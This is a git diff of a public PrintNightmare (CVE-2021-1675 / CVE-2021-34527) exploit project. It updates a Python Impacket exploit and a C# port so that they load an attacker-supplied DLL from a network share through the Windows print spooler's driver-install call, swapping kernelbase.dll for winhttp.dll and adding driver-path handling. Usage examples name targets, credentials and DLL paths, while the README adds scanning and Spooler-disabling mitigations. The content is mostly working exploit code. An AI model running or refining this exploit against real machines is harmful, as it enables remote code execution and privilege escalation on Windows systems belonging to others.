diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 7f5d527..1807985 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL from impacket.structure import Structure import argparse import sys -import time import pathlib #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 @@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL): return blob -def main(username, password, domain, lmhash, nthash, address, port, share): - #connect - dce = connect(username, password, domain, lmhash, nthash, address, port) - #handle = "\\\\{0}\x00".format(address) - handle = NULL - - #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path - try: - blob = getDrivers(dce, handle) - pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' - except Exception as e: - print('[-] Failed to enumerate remote pDriverPath') - print(str(e)) - sys.exit(1) - - print("[+] pDriverPath Found {0}".format(pDriverPath)) - +def main(dce, pDriverPath, share): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 @@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share): container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00" + flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 filename = share.split("\\")[-1] - print("[*] Executing {0}".format(share)) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) + + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" for i in range(1, 30): try: container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) @@ -118,9 +102,11 @@ if __name__ == '__main__': parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' +./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') + parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group = parser.add_argument_group('connection') @@ -161,12 +147,34 @@ Example; lmhash = '' nthash = '' + #connect + dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port) + #handle = "\\\\{0}\x00".format(address) + handle = NULL + + #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path + if not options.pDriverPath: + try: + blob = getDrivers(dce, handle) + pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' + if not "filerepository" in pDriverPath: + print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath)) + print("[-] Specify pDriverPath manually") + sys.exit(1) + except Exception as e: + print('[-] Failed to enumerate remote pDriverPath') + print(str(e)) + sys.exit(1) + else: + pDriverPath = options.pDriverPath + + print("[+] pDriverPath Found {0}".format(pDriverPath)) + print("[*] Executing {0}".format(options.share)) + #re-run if stage0/stageX fails print("[*] Try 1...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath, options.share) print("[*] Try 2...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) - time.sleep(10) + main(dce, pDriverPath,options.share) print("[*] Try 3...") - main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) \ No newline at end of file + main(dce, pDriverPath,options.share) \ No newline at end of file diff --git a/README.md b/README.md index 70d1568..5b7885d 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# CVE-2021-1675 +# CVE-2021-1675 / CVE-2021-34527 Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) @@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_ ### Scanning -We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable +We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable -``` +```bash rpcdump.py @192.168.1.10 | grep MS-RPRN Protocol: [MS-RPRN]: Print System Remote Protocol @@ -100,7 +100,7 @@ Disable Spooler service ```powershell Stop-Service Spooler -REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f +REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f ``` Or Uninstall Print-Services diff --git a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index aad948e..0000000 Binary files a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo and /dev/null differ diff --git a/SharpPrintNightmare/README.md b/SharpPrintNightmare/README.md index 0350366..28f743d 100644 --- a/SharpPrintNightmare/README.md +++ b/SharpPrintNightmare/README.md @@ -1,7 +1,9 @@ -# C# Implementation of CVE-2021-1675 +# C# Implementation of CVE-2021-1675 / CVE-2021-34527 ### Usage +The RCE functionality might need to be executed with local administrator privileges on YOUR machine. + ``` #LPE C:\SharpPrintNightmare.exe C:\addCube.dll diff --git a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo deleted file mode 100644 index ce63ce0..0000000 Binary files a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo and /dev/null differ diff --git a/SharpPrintNightmare/SharpPrintNightmare/Program.cs b/SharpPrintNightmare/SharpPrintNightmare/Program.cs index a03d26c..f787dfc 100644 --- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs +++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs @@ -82,13 +82,17 @@ namespace SharpPrintNightmare break; } } - //lucky shot + //could not find driver path if (pDriverPath == "") { - pDriverPath = drivers[0].pDriverPath; + Console.WriteLine($"[-] [-] pDriverPath {pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\....."); + Console.WriteLine($"[-] Specify pDriverPath manually"); + Environment.Exit(1); } - pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL"; } + Console.WriteLine($"[*] pDriverPath {pDriverPath}"); + Console.WriteLine($"[*] Executing {dllpath}"); + if (args.Length > 2) { path = args[2]; @@ -117,13 +121,11 @@ namespace SharpPrintNightmare //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug - Console.WriteLine($"[*] pDriverPath {pDriverPath}"); - Console.WriteLine($"[*] Executing {dllpath}"); //DRIVER_INFO_2 Level2 = drivers[0]; // debug DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); Level2.cVersion = 3; - Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; + Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp Level2.pDataFile = dllpath; Level2.pDriverPath = pDriverPath; Level2.pEnvironment = "Windows x64"; @@ -141,6 +143,8 @@ namespace SharpPrintNightmare Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); Marshal.FreeHGlobal(pnt); + //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ + Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; for (int i = 1; i <= 30; i++) { //add path to our exploit